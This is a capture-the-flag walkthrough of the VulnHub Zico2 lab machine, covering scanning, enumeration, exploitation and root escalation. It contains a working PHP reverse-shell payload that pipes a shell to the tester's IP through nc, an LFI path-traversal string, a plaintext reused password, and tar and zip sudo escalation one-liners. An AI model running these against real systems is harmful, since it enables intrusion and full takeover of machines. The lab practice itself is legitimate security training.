Link: https://www.vulnhub.com/entry/zico2-1,210/

Initial foothold

  1. Network discovery
nmap -sn 10.0.2.32/24

My target is 10.0.2.38.

2. Port scan

nmap -Pn 10.0.2.38nmap -Pn -p1000- 10.0.2.38

There’re 4 open ports: 22, 80, 111, and 57516.

3. OS and service scan

nmap -A -p22,80,111,57516 10.0.2.38

4. Vuln scan

nmap --script vuln -p22,80,111,57516 10.0.2.38

Service Enumeration

  1. SSH port 22

Initial connection

ssh 10.0.2.38

There’s no any banners.

2. HTTP port 80

Nikto scan

nikto -h http://10.0.2.38

There’re interesting directories as listed in snapshot.

Directory scan

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.38/ -x php,txt,html,sh,cgi -q

Access HTTP site

Viewing page source revealed that there’s possible LFI vulnerability.

Verify it

Intercept w/ Burp Suite and send to the Repeater

Test for LFI by edit string of the request as highlighted.

../../../../../etc/passwd

Success!!!

Access other directories from scan result. I came across /dbadmin which contains phpLiteAdmin v1.9.3.

I googled it and came across this exploit guide.

3. RPCBind port 111

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.0.2.38

Exploitation

  1. Access test_users database. I got credentials of root and zico.

2. Crack hashes w/ crackstation.

3. Use cracked hash to login w/ ssh

ssh root@10.0.2.38ssh zico@10.0.2.38

Failed!

4. Exploit phpLiteAdmin

I will follow exploitation guide

Create New Database as ‘hack.php’

Create new table

Supply reverse shell command using this guide

I used this command and save as TEXT

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.2.32 443 >/tmp/f");?>

File ‘hack.php’ will be stored in ‘/use/database/hack.php’

Prepare reverse shell listener on port 443

rlwrap nc -lvp 443

Access w/ LFI vulnerability that I discovered.

Back to the listener, I got the shell

NOTE: Before I got the shell, I tried many commands. If you don't have the shell yet, just keep trying.

Privilege Escalation

  1. Import TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'

2. Explore directories

cd /var/wwwls -la

Nothing useful

cd /homels -lacd zicols -la

There’s a Wordpress directory

cd wordpresscat wp-config.php

Now I got zico’s credential of mysql.

Some people re-use their credential. I’ll try to use them and login as zico

su zicopassword: sWfCsfJSPV9H3AmQzw8

Now I’m zico. Next is verifying sudo

sudo -l

I have 2 method to escalate my privileges to root.

Starting w/ tar, I used this guide.

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/shwhoamicd /rootls -lacat flag.txt

Now I’m root.

Another method is zip

TF=$(mktemp -u)sudo zip $TF /etc/hosts -T -TT 'sh #'whoami

Now, I’m root.